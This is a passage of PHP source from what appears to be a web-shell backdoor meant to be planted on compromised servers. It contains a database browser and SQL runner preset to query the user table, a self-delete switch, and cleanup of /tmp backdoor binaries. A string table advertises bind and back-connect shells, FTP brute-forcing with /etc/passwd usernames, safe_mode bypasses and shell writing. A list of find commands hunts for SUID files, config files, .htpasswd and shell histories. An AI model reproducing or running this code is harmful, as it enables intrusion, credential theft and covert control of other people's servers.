  1604.            // $showall=false;
  1605.                         $result=editrec($_SESSION['dbname'],$tablename, $_POST['pk'], $_POST['pv'], $_POST['array']);
  1606.                 }
  1607. //**************** Search ************************************
  1608.                 if(isset($_POST['searchval'])){
  1609.                         $searchval=$_POST['searchval'];
  1610.                 }elseif(isset($_GET['searchval'])){
  1611.                         $searchval=$_GET['searchval'];
  1612.                 }else{
  1613.                         $searchval="";
  1614.                 }
  1615.  
  1616.                 if (isset($_GET['tablename'])){
  1617.                         $tablename = $_GET['tablename'];
  1618.                 }
  1619.  
  1620.                 if((isset($_POST['search'])|| isset($searchval)) && $searchval !=""){
  1621.                         $result=searcht($tablename, $_SESSION['dbname'],  $searchval);
  1622.                 }else{
  1623.                         //Display All
  1624.                         $query = "select * from $tablename";
  1625.                         $result=exequery($query, $tablename, $_SESSION['dbname']);
  1626.                 }
  1627.  
  1628. //***************** Display record count *****************************************
  1629.         if($showall){
  1630.             $num_rows = mysql_num_rows($result);
  1631.             //Workout whick page to display
  1632.                     if(!isset($_GET['pg']) && !isset($pg)){
  1633.                             $beg=0;
  1634.                 $pg=0;
  1635.                     }else{
  1636.                 if(isset($_GET['pback'])){
  1637.                     $pg=$_GET['pg'];
  1638.                 }else{
  1639.                     $pg=$_GET['pg'];
  1640.                 }
  1641.                  if($pg < 0 ){
  1642.                     $pg=0;
  1643.                 }
  1644.                 if($pg > $num_rows/$pagemax){
  1645.                     $pg=ceil($num_rows/$pagemax)-1;
  1646.                 }
  1647.                 $beg = $pg * $pagemax;
  1648.  
  1649.                     }
  1650.                     if (!isset($_POST['add'])){
  1651.                             $pscrol=" ";
  1652.                             $pagescrol =" ";
  1653.  
  1654.                             $pagescrol = whichpage($num_rows, $pagemax, $pg, $tablename, $searchval);
  1655.  
  1656.                             echo "$pagescrol\n"; //Display next Top page menu
  1657.  
  1658.                             $flds = mysql_num_fields($result);
  1659.                             echo"<table border=0 width='100%'>\n";
  1660.                             echo"<tr class=head><td></td><td></td>\n";
  1661.                             $fields = mysql_list_fields( $_SESSION['dbname'], $tablename);
  1662.  
  1663.                             $z=0;
  1664.                             $x =0;
  1665.                             $pkfield=array();
  1666.  
  1667. //*************Display each of the field names.***************************
  1668.                             for ($i = 0; $i < $flds; $i++) {
  1669.                                         echo "<td>".mysql_field_name($fields, $i)."</td>\n";
  1670.  
  1671.                                     //Find the primary key
  1672.                                     $flagstring = mysql_field_flags ($result, $i);
  1673.                                     if(eregi("primary",$flagstring )){
  1674.                                             $pk[$z] = $i;
  1675.  
  1676.                                             $pkfield[$z]= mysql_field_name($fields, $i);
  1677.                                             $z++;
  1678.                                     }
  1679.                             }
  1680.                             echo"</tr>\n";
  1681.                             $tbl=$tablename;
  1682.                             //if(isset($pk)){
  1683.                             if($z > 0){
  1684.                                     $cpk=count($pk);
  1685.                             }else{
  1686.                                     $cpk=0;
  1687.                             }
  1688.  
  1689. //************Display each row from the table.********************************
  1690.  
  1691.                             for ($s=$beg; $s < $beg + $pagemax; $s++){
  1692.                                     if($s < $num_rows){
  1693.                                             if (!mysql_data_seek ($result, $s)) {
  1694.                                         echo "Cannot seek to row $s\n";
  1695.                                         continue;
  1696.                                     }
  1697.                                             $row=mysql_fetch_array($result);
  1698.                                             if(!isset($pk)){
  1699.                                                     $pk=" ";
  1700.                                                     $pkfield= array();
  1701.                                             }
  1702.                                             displayrow($_SESSION['dbname'], $tbl, $pk, $pkfield, $cpk, $row, $flds);
  1703.                                     }
  1704.                             }
  1705.                     }
  1706.                     echo"</table>\n";
  1707.                     if (!isset($_POST['add']) && !isset($_POST['edit']) && !isset($_POST['deltable']) && !isset($_POST['droptab']) && !isset($_POST['wyoq']) && $tablename){
  1708.                             echo"<br>";
  1709.                             echo "$pagescrol\n"; //Display bottom next page menu
  1710.                     }
  1711.                     echo"<br><br>\n";
  1712.                  }//showall
  1713.                  if(isset($_POST['tablename'])){
  1714.                          echo"<table border=0>";
  1715.                      echo"<tr><td>";
  1716.                          $tablename=$_POST['tablename'];
  1717.                          $va="Alter Table $tablename";
  1718.                          goto( $tablename,  $_SESSION['dbname'],'alter.php', 'but', 'altertable', $va );
  1719.                          echo"</td></tr>\n";
  1720.                          echo"</table>\n";
  1721.                 }
  1722.         }
  1723. }
  1724. display_foot();
  1725. echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";  die(); }
  1726.  
  1727. if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
  1728.  {
  1729.  echo $head;
  1730.  $sql = new my_sql();
  1731.  $sql->db   = $_POST['db'];
  1732.  $sql->host = $_POST['db_server'];
  1733.  $sql->port = $_POST['db_port'];
  1734.  $sql->user = $_POST['mysql_l'];
  1735.  $sql->pass = $_POST['mysql_p'];
  1736.  $sql->base = $_POST['mysql_db'];
  1737.  $querys = @explode(';',$_POST['db_query']);
  1738.  echo '<body bgcolor=#000000>';
  1739.  if(!$sql->connect()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
  1740.   else
  1741.    {
  1742.    if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=tahoma size=-2 color=red><b>?? ?????? ????? ????? ????????</b></font></div>";
  1743.    else
  1744.     {
  1745.     foreach($querys as $num=>$query)
  1746.      {
  1747.       if(strlen($query)>5)
  1748.       {
  1749.       echo "<font face=tahoma size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
  1750.       switch($sql->query($query))
  1751.        {
  1752.        case '0':
  1753.        echo "<table width=100%><tr><td><font face=tahoma size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
  1754.        break;
  1755.        case '1':
  1756.        if($sql->get_result())
  1757.         {
  1758.                echo "<table width=100%>";
  1759.         foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
  1760.                $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=tahoma size=-2><b>&nbsp;", $sql->columns);
  1761.         echo "<tr><td bgcolor=#333333><font face=tahoma size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
  1762.         for($i=0;$i<$sql->num_rows;$i++)
  1763.          {
  1764.          foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
  1765.          $values = @implode("&nbsp;</font></td><td><font face=tahoma size=-2>&nbsp;",$sql->rows[$i]);
  1766.          echo '<tr><td><font face=tahoma size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
  1767.          }
  1768.         echo "</table>";
  1769.         }
  1770.        break;
  1771.        case '2':
  1772.        $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
  1773.        echo "<table width=100%><tr><td><font face=tahoma size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
  1774.        break;
  1775.        }
  1776.       }
  1777.      }
  1778.     }
  1779.    }
  1780.  echo "<br><form name=form method=POST>";
  1781.  echo in('hidden','db',0,$_POST['db']);
  1782.  echo in('hidden','db_server',0,$_POST['db_server']);
  1783.  echo in('hidden','db_port',0,$_POST['db_port']);
  1784.  echo in('hidden','mysql_l',0,$_POST['mysql_l']);
  1785.  echo in('hidden','mysql_p',0,$_POST['mysql_p']);
  1786.  echo in('hidden','mysql_db',0,$_POST['mysql_db']);
  1787.  echo in('hidden','cmd',0,'db_query');
  1788.  echo "<div align=center>";
  1789.  echo "<font face=tahoma size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
  1790.  echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
  1791.  echo "</form>";
  1792.  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
  1793.  }
  1794. if(isset($_GET['delete']))
  1795.  {
  1796.    @unlink(__FILE__);
  1797.  }
  1798. if(isset($_GET['tmp']))
  1799.  {
  1800.    @unlink("/tmp/bdpl");
  1801.    @unlink("/tmp/back");
  1802.    @unlink("/tmp/bd");
  1803.    @unlink("/tmp/bd.c");
  1804.    @unlink("/tmp/dp");
  1805.    @unlink("/tmp/dpc");
  1806.    @unlink("/tmp/dpc.c");
  1807.  }
  1808. if(isset($_GET['phpini']))
  1809. {
  1810. echo $head;
  1811. function U_value($value)
  1812.  {
  1813.  if ($value == '') return '<i>no value</i>';
  1814.  if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
  1815.  if ($value === null) return 'NULL';
  1816.  if (@is_object($value)) $value = (array) $value;
  1817.  if (@is_array($value))
  1818.  {
  1819.  @ob_start();
  1820.  print_r($value);
  1821.  $value = @ob_get_contents();
  1822.  @ob_end_clean();
  1823.  }
  1824.  return U_wordwrap((string) $value);
  1825.  }
  1826. function U_wordwrap($str)
  1827.  {
  1828.  $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
  1829.  return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
  1830.  }
  1831. if (@function_exists('ini_get_all'))
  1832.  {
  1833.  $r = '';
  1834.  echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
  1835.  foreach (@ini_get_all() as $key=>$value)
  1836.   {
  1837.   $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.$key.'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
  1838.   }
  1839.  echo $r;
  1840.  echo '</table>';
  1841.  }
  1842. echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1843. die();
  1844. }
  1845. if(isset($_GET['cpu']))
  1846.  {
  1847.    echo $head;
  1848.    echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
  1849.    $cpuf = @file("cpuinfo");
  1850.    if($cpuf)
  1851.     {
  1852.       $c = @sizeof($cpuf);
  1853.       for($i=0;$i<$c;$i++)
  1854.         {
  1855.           $info = @explode(":",$cpuf[$i]);
  1856.           if($info[1]==""){ $info[1]="---"; }
  1857.           $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
  1858.         }
  1859.       echo $r;
  1860.     }
  1861.    else
  1862.     {
  1863.       echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
  1864.     }
  1865.    echo '</table>';
  1866.    echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1867.    die();
  1868.  }
  1869. if(isset($_GET['mem']))
  1870.  {
  1871.    echo $head;
  1872.    echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
  1873.    $memf = @file("meminfo");
  1874.    if($memf)
  1875.     {
  1876.       $c = sizeof($memf);
  1877.       for($i=0;$i<$c;$i++)
  1878.         {
  1879.           $info = explode(":",$memf[$i]);
  1880.           if($info[1]==""){ $info[1]="---"; }
  1881.           $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
  1882.         }
  1883.       echo $r;
  1884.     }
  1885.    else
  1886.     {
  1887.       echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
  1888.     }
  1889.    echo '</table>';
  1890.    echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1891.    die();
  1892.  }
  1893. $lang=array(
  1894. 'eng_text1' =>'Executed command',
  1895. 'eng_text2' =>'Execute command on server',
  1896. 'eng_text3' =>'Run command',
  1897. 'eng_text4' =>'Work directory',
  1898. 'eng_text5' =>'Upload files on server',
  1899. 'eng_text6' =>'Local file',
  1900. 'eng_text7' =>'Aliases',
  1901. 'eng_text8' =>'Select alias',
  1902. 'eng_butt1' =>'Execute',
  1903. 'eng_butt2' =>'Upload',
  1904. 'eng_text9' =>'Bind port to /bin/bash',
  1905. 'eng_text10'=>'Port',
  1906. 'eng_text11'=>'Password for access',
  1907. 'eng_butt3' =>'Bind',
  1908. 'eng_text12'=>'back-connect',
  1909. 'eng_text13'=>'IP',
  1910. 'eng_text14'=>'Port',
  1911. 'eng_butt4' =>'Connect',
  1912. 'eng_text15'=>'Upload files from remote server',
  1913. 'eng_text16'=>'With',
  1914. 'eng_text17'=>'Remote file',
  1915. 'eng_text18'=>'Local file',
  1916. 'eng_text19'=>'Exploits',
  1917. 'eng_text20'=>'Use',
  1918. 'eng_text21'=>'&nbsp;New name',
  1919. 'eng_text22'=>'datapipe',
  1920. 'eng_text23'=>'Local port',
  1921. 'eng_text24'=>'Remote host',
  1922. 'eng_text25'=>'Remote port',
  1923. 'eng_text26'=>'Use',
  1924. 'eng_butt5' =>'Run',
  1925. 'eng_text28'=>'Work in safe_mode',
  1926. 'eng_text29'=>'ACCESS DENIED',
  1927. 'eng_butt6' =>'Change',
  1928. 'eng_text30'=>'Cat file',
  1929. 'eng_butt7' =>'Show',
  1930. 'eng_text31'=>'File not found',
  1931. 'eng_text32'=>'Eval PHP code',
  1932. 'eng_text33'=>'Test bypass open_basedir with cURL functions',
  1933. 'eng_butt8' =>'Test',
  1934. 'eng_text34'=>'Test bypass safe_mode with include function',
  1935. 'eng_text35'=>'Test bypass safe_mode with load file in mysql',
  1936. 'eng_text36'=>'Database . Table',
  1937. 'eng_text37'=>'Login',
  1938. 'eng_text38'=>'Password',
  1939. 'eng_text39'=>'Database',
  1940. 'eng_text40'=>'Dump database table',
  1941. 'eng_butt9' =>'Dump',
  1942. 'eng_text41'=>'Save dump in file',
  1943. 'eng_text42'=>'Edit files',
  1944. 'eng_text43'=>'File for edit',
  1945. 'eng_butt10'=>'Save',
  1946. 'eng_text44'=>'Can\'t edit file! Only read access!',
  1947. 'eng_text45'=>'File saved',
  1948. 'eng_text46'=>'Show phpinfo()',
  1949. 'eng_text47'=>'Show variables from php.ini',
  1950. 'eng_text48'=>'Delete temp files',
  1951. 'eng_butt11'=>'Edit file',
  1952. 'eng_text49'=>'Delete script from server',
  1953. 'eng_text50'=>'View cpu info',
  1954. 'eng_text51'=>'View memory info',
  1955. 'eng_text52'=>'Find text',
  1956. 'eng_text53'=>'In dirs',
  1957. 'eng_text54'=>'Find text in files',
  1958. 'eng_butt12'=>'Find',
  1959. 'eng_text55'=>'Only in files',
  1960. 'eng_text56'=>'Nothing :(',
  1961. 'eng_text57'=>'Create/Delete File/Dir',
  1962. 'eng_text58'=>'name',
  1963. 'eng_text59'=>'file',
  1964. 'eng_text60'=>'dir',
  1965. 'eng_butt13'=>'Create/Delete',
  1966. 'eng_text61'=>'File created',
  1967. 'eng_text62'=>'Dir created',
  1968. 'eng_text63'=>'File deleted',
  1969. 'eng_text64'=>'Dir deleted',
  1970. 'eng_butt65'=>'Create',
  1971. 'eng_text65'=>'Create',
  1972. 'eng_text66'=>'Delete',
  1973. 'eng_text67'=>'Chown/Chgrp/Chmod',
  1974. 'eng_text68'=>'Command',
  1975. 'eng_text69'=>'param1',
  1976. 'eng_text70'=>'param2',
  1977. 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
  1978. 'eng_text72'=>'Text for find',
  1979. 'eng_text73'=>'Find in folder',
  1980. 'eng_text74'=>'Find in files',
  1981. 'eng_text75'=>'* you can use regexp',
  1982. 'eng_text76'=>'Search text in files via find',
  1983. 'eng_text80'=>'Type',
  1984. 'eng_text81'=>'Net',
  1985. 'eng_text82'=>'Databases',
  1986. 'eng_text83'=>'Run SQL query',
  1987. 'eng_text84'=>'SQL query',
  1988. 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
  1989. 'eng_text86'=>'Download files from server',
  1990. 'eng_butt14'=>'Download',
  1991. 'eng_text87'=>'Download files from remote ftp-server',
  1992. 'eng_text88'=>'FTP-server:port',
  1993. 'eng_text89'=>'File on ftp',
  1994. 'eng_text90'=>'Transfer mode',
  1995. 'eng_text91'=>'Archivation',
  1996. 'eng_text92'=>'without archivation',
  1997. 'eng_text93'=>'FTP',
  1998. 'eng_text94'=>'FTP-bruteforce',
  1999. 'eng_text95'=>'Users list',
  2000. 'eng_text96'=>'Can\'t get users list',
  2001. 'eng_text97'=>'checked: ',
  2002. 'eng_text98'=>'success: ',
  2003. 'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
  2004. 'eng_text100'=>'Send file to remote ftp server',
  2005. 'eng_text101'=>'Use reverse (user -> resu) login for password',
  2006. 'eng_text102'=>'Mail',
  2007. 'eng_text103'=>'Send email',
  2008. 'eng_text104'=>'Send file to email',
  2009. 'eng_text105'=>'To',
  2010. 'eng_text106'=>'From',
  2011. 'eng_text107'=>'Subj',
  2012. 'eng_butt15'=>'Send',
  2013. 'eng_text108'=>'Mail',
  2014. 'eng_text109'=>'Hide',
  2015. 'eng_text110'=>'Show',
  2016. 'eng_text111'=>'SQL-Server : Port',
  2017. 'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
  2018. 'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
  2019. 'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
  2020. 'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
  2021. 'eng_text116'=>'Copy from',
  2022. 'eng_text117'=>'to',
  2023. 'eng_text118'=>'File copied',
  2024. 'eng_text119'=>'Cant copy file',
  2025. 'eng_err0'=>'Error! Can\'t write in file ',
  2026. 'eng_err1'=>'Error! Can\'t read file ',
  2027. 'eng_err2'=>'Error! Can\'t create ',
  2028. 'eng_err3'=>'Error! Can\'t connect to ftp',
  2029. 'eng_err4'=>'Error! Can\'t login on ftp server',
  2030. 'eng_err5'=>'Error! Can\'t change dir on ftp',
  2031. 'eng_err6'=>'Error! Can\'t sent mail',
  2032. 'eng_err7'=>'Mail send',
  2033. 'eng_text200'=>'read file from vul copy()',
  2034. 'eng_text202'=>'where file in server',
  2035. 'eng_text300'=>'read file from vul curl()',
  2036. 'eng_text203'=>'read file from vul ini_restore()',
  2037. 'eng_text204'=>'write shell from vul error_log()',
  2038. 'eng_text205'=>'write shell in this side',
  2039. 'eng_text206'=>'read dir',
  2040. 'eng_text207'=>'read dir from vul reg_glob',
  2041. 'eng_text208'=>'execute with function',
  2042. 'eng_text209'=>'read dir from vul root',
  2043. 'eng_text210'=>'DeZender ',
  2044. 'eng_text211'=>'::safe_mode off::',
  2045. 'eng_text212'=>'close safe_mode with php.ini',
  2046. 'eng_text213'=>'close security_mod with .htaccess',
  2047. 'eng_text214'=>'Admin name',
  2048. 'eng_text215'=>'IRC server ',
  2049. 'eng_text216'=>'#room name',
  2050. 'eng_text217'=>'server',
  2051. 'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
  2052. 'eng_text219'=>'Get file to server in safe_mode and change name',
  2053. 'eng_text220'=>'show file with symlink vul',
  2054. 'eng_text221'=>'zip file in server to download',
  2055. 'eng_text222'=>'2 symlink use vul',
  2056. 'eng_text223'=>'read file from funcution',
  2057. 'eng_text224'=>'read file from PLUGIN ',
  2058.  
  2059. /* --------------------------------------------------------------- */
  2060. 'ar_text1' =>'Executed command',
  2061. 'ar_text2' =>'Execute command on server',
  2062. 'ar_text3' =>'Run command',
  2063. 'ar_text4' =>'Work directory',
  2064. 'ar_text5' =>'Upload files on server',
  2065. 'ar_text6' =>'Local file',
  2066. 'ar_text7' =>'Aliases',
  2067. 'ar_text8' =>'Select alias',
  2068. 'ar_butt1' =>'Execute',
  2069. 'ar_butt2' =>'Upload',
  2070. 'ar_text9' =>'Bind port to /bin/bash',
  2071. 'ar_text10'=>'Port',
  2072. 'ar_text11'=>'Password for access',
  2073. 'ar_butt3' =>'Bind',
  2074. 'ar_text12'=>'back-connect',
  2075. 'ar_text13'=>'IP',
  2076. 'ar_text14'=>'Port',
  2077. 'ar_butt4' =>'Connect',
  2078. 'ar_text15'=>'Upload files from remote server',
  2079. 'ar_text16'=>'With',
  2080. 'ar_text17'=>'Remote file',
  2081. 'ar_text18'=>'Local file',
  2082. 'ar_text19'=>'Exploits',
  2083. 'ar_text20'=>'Use',
  2084. 'ar_text21'=>'&nbsp;New name',
  2085. 'ar_text22'=>'datapipe',
  2086. 'ar_text23'=>'Local port',
  2087. 'ar_text24'=>'Remote host',
  2088. 'ar_text25'=>'Remote port',
  2089. 'ar_text26'=>'Use',
  2090. 'ar_butt5' =>'Run',
  2091. 'ar_text28'=>'Work in safe_mode',
  2092. 'ar_text29'=>'ACCESS DENIED',
  2093. 'ar_butt6' =>'Change',
  2094. 'ar_text30'=>'Cat file',
  2095. 'ar_butt7' =>'Show',
  2096. 'ar_text31'=>'File not found',
  2097. 'ar_text32'=>'Eval PHP code',
  2098. 'ar_text33'=>'Test bypass open_basedir with cURL functions',
  2099. 'ar_butt8' =>'Test',
  2100. 'ar_text34'=>'Test bypass safe_mode with include function',
  2101. 'ar_text35'=>'Test bypass safe_mode with load file in mysql',
  2102. 'ar_text36'=>'Database . Table',
  2103. 'ar_text37'=>'Login',
  2104. 'ar_text38'=>'Password',
  2105. 'ar_text39'=>'Database',
  2106. 'ar_text40'=>'Dump database table',
  2107. 'ar_butt9' =>'Dump',
  2108. 'ar_text41'=>'Save dump in file',
  2109. 'ar_text42'=>'Edit files',
  2110. 'ar_text43'=>'File for edit',
  2111. 'ar_butt10'=>'Save',
  2112. 'ar_text44'=>'Can\'t edit file! Only read access!',
  2113. 'ar_text45'=>'File saved',
  2114. 'ar_text46'=>'Show phpinfo()',
  2115. 'ar_text47'=>'Show variables from php.ini',
  2116. 'ar_text48'=>'Delete temp files',
  2117. 'ar_butt11'=>'Edit file',
  2118. 'ar_text49'=>'Delete script from server',
  2119. 'ar_text50'=>'View cpu info',
  2120. 'ar_text51'=>'View memory info',
  2121. 'ar_text52'=>'Find text',
  2122. 'ar_text53'=>'In dirs',
  2123. 'ar_text54'=>'Find text in files',
  2124. 'ar_butt12'=>'Find',
  2125. 'ar_text55'=>'Only in files',
  2126. 'ar_text56'=>'Nothing :(',
  2127. 'ar_text57'=>'Create/Delete File/Dir',
  2128. 'ar_text58'=>'name',
  2129. 'ar_text59'=>'file',
  2130. 'ar_text60'=>'dir',
  2131. 'ar_butt13'=>'Create/Delete',
  2132. 'ar_text61'=>'File created',
  2133. 'ar_text62'=>'Dir created',
  2134. 'ar_text63'=>'File deleted',
  2135. 'ar_text64'=>'Dir deleted',
  2136. 'ar_butt65'=>'Create',
  2137. 'ar_text65'=>'Create',
  2138. 'ar_text66'=>'Delete',
  2139. 'ar_text67'=>'Chown/Chgrp/Chmod',
  2140. 'ar_text68'=>'Command',
  2141. 'ar_text69'=>'param1',
  2142. 'ar_text70'=>'param2',
  2143. 'ar_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
  2144. 'ar_text72'=>'Text for find',
  2145. 'ar_text73'=>'Find in folder',
  2146. 'ar_text74'=>'Find in files',
  2147. 'ar_text75'=>'* you can use regexp',
  2148. 'ar_text76'=>'Search text in files via find',
  2149. 'ar_text80'=>'Type',
  2150. 'ar_text81'=>'Net',
  2151. 'ar_text82'=>'Databases',
  2152. 'ar_text83'=>'Run SQL query',
  2153. 'ar_text84'=>'SQL query',
  2154. 'ar_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
  2155. 'ar_text86'=>'Download files from server',
  2156. 'ar_butt14'=>'Download',
  2157. 'ar_text87'=>'Download files from remote ftp-server',
  2158. 'ar_text88'=>'FTP-server:port',
  2159. 'ar_text89'=>'File on ftp',
  2160. 'ar_text90'=>'Transfer mode',
  2161. 'ar_text91'=>'Archivation',
  2162. 'ar_text92'=>'without archivation',
  2163. 'ar_text93'=>'FTP',
  2164. 'ar_text94'=>'FTP-bruteforce',
  2165. 'ar_text95'=>'Users list',
  2166. 'ar_text96'=>'Can\'t get users list',
  2167. 'ar_text97'=>'checked: ',
  2168. 'ar_text98'=>'success: ',
  2169. 'ar_text99'=>'* use username from /etc/passwd for ftp login and password',
  2170. 'ar_text100'=>'Send file to remote ftp server',
  2171. 'ar_text101'=>'Use reverse (user -> resu) login for password',
  2172. 'ar_text102'=>'Mail',
  2173. 'ar_text103'=>'Send email',
  2174. 'ar_text104'=>'Send file to email',
  2175. 'ar_text105'=>'To',
  2176. 'ar_text106'=>'From',
  2177. 'ar_text107'=>'Subj',
  2178. 'ar_butt15'=>'Send',
  2179. 'ar_text108'=>'Mail',
  2180. 'ar_text109'=>'Hide',
  2181. 'ar_text110'=>'Show',
  2182. 'ar_text111'=>'SQL-Server : Port',
  2183. 'ar_text112'=>'Test bypass safe_mode with function mb_send_mail',
  2184. 'ar_text113'=>'Test bypass safe_mode, view dir list via imap_list',
  2185. 'ar_text114'=>'Test bypass safe_mode, view file contest via imap_body',
  2186. 'ar_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
  2187. 'ar_text116'=>'Copy from',
  2188. 'ar_text117'=>'to',
  2189. 'ar_text118'=>'File copied',
  2190. 'ar_text119'=>'Cant copy file',
  2191. 'ar_err0'=>'Error! Can\'t write in file ',
  2192. 'ar_err1'=>'Error! Can\'t read file ',
  2193. 'ar_err2'=>'Error! Can\'t create ',
  2194. 'ar_err3'=>'Error! Can\'t connect to ftp',
  2195. 'ar_err4'=>'Error! Can\'t login on ftp server',
  2196. 'ar_err5'=>'Error! Can\'t change dir on ftp',
  2197. 'ar_err6'=>'Error! Can\'t sent mail',
  2198. 'ar_err7'=>'Mail send',
  2199. 'ar_text200'=>'read file from vul copy()',
  2200. 'ar_text202'=>'where file in server',
  2201. 'ar_text300'=>'read file from vul curl()',
  2202. 'ar_text203'=>'read file from vul ini_restore()',
  2203. 'ar_text204'=>'write shell from vul error_log()',
  2204. 'ar_text205'=>'write shell in this side',
  2205. 'ar_text206'=>'read dir',
  2206. 'ar_text207'=>'read dir from vul reg_glob',
  2207. 'ar_text208'=>'execute with function',
  2208. 'ar_text209'=>'read dir from vul root',
  2209. 'ar_text210'=>'DeZender ',
  2210. 'ar_text211'=>'::safe_mode off::',
  2211. 'ar_text212'=>'colse safe_mode with php.ini',
  2212. 'ar_text213'=>'colse security_mod with .htaccess',
  2213. 'ar_text214'=>'Admin name',
  2214. 'ar_text215'=>'IRC server ',
  2215. 'ar_text216'=>'#room name',
  2216. 'ar_text217'=>'server',
  2217. 'ar_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
  2218. 'ar_text219'=>'Get file to server in safe_mode and change name',
  2219. 'ar_text220'=>'show file with symlink vul',
  2220. 'ar_text221'=>'zip file in server to download',
  2221. 'ar_text222'=>'2 symlink use vul',
  2222. 'ar_text223'=>'read file from funcution',
  2223. 'ar_text224'=>'read file from PLUGIN ',
  2224. );
  2225. $aliases=array(
  2226. 'Search for files suid'=>'find / -type f -perm -04000 -ls',
  2227. 'Search for files suid  Volume current'=>'find . -type f -perm -04000 -ls',
  2228. 'Search for files suid'=>'find / -type f -perm -02000 -ls',
  2229. 'Search for files suid  Volume current'=>'find . -type f -perm -02000 -ls',
  2230. 'Search for files config.inc.php'=>'find / -type f -name config.inc.php',
  2231. 'Search for files config.inc.php  Volume current'=>'find . -type f -name config.inc.php',
  2232. 'Search for files config* All Extensions'=>'find / -type f -name "config*"',
  2233. 'Search for files config*  Volume current'=>'find . -type f -name "config*"',
  2234. 'Search for files that are writing'=>'find / -type f -perm -2 -ls',
  2235. 'Search for files that are writing  Volume current'=>'find . -type f -perm -2 -ls',
  2236. 'Search for viable volumes of writing'=>'find /  -type d -perm -2 -ls',
  2237. 'Search for viable volumes of writing In the present course'=>'find . -type d -perm -2 -ls',
  2238. 'Search for files The volumes are writing'=>'find / -perm -2 -ls',
  2239. 'Search for files The volumes In the present course'=>'find . -perm -2 -ls',
  2240. 'Search for files service.pwd'=>'find / -type f -name service.pwd',
  2241. 'Search for files service.pwd In the present course'=>'find . -type f -name service.pwd',
  2242. 'Search for all files firewalls .htpasswd'=>'find / -type f -name .htpasswd',
  2243. 'Search for all files firewalls In the present course'=>'find . -type f -name .htpasswd',
  2244. 'Search for all files .bash_history'=>'find / -type f -name .bash_history',
  2245. 'Search for all files .bash_history In the present course'=>'find . -type f -name .bash_history',
  2246. 'Search for all files .mysql_history'=>'find / -type f -name .mysql_history',
  2247. 'Search for all files .mysql_history In the present course'=>'find . -type f -name .mysql_history',
  2248. 'Search for all files .fetchmailrc'=>'find / -type f -name .fetchmailrc',
  2249. 'Search for all files .fetchmailrc In the present course'=>'find . -type f -name .fetchmailrc',
  2250. 'Another operator files in the system'=>'lsattr -va',
  2251. 'Vision Albortat open server'=>'netstat -an | grep -i listen',
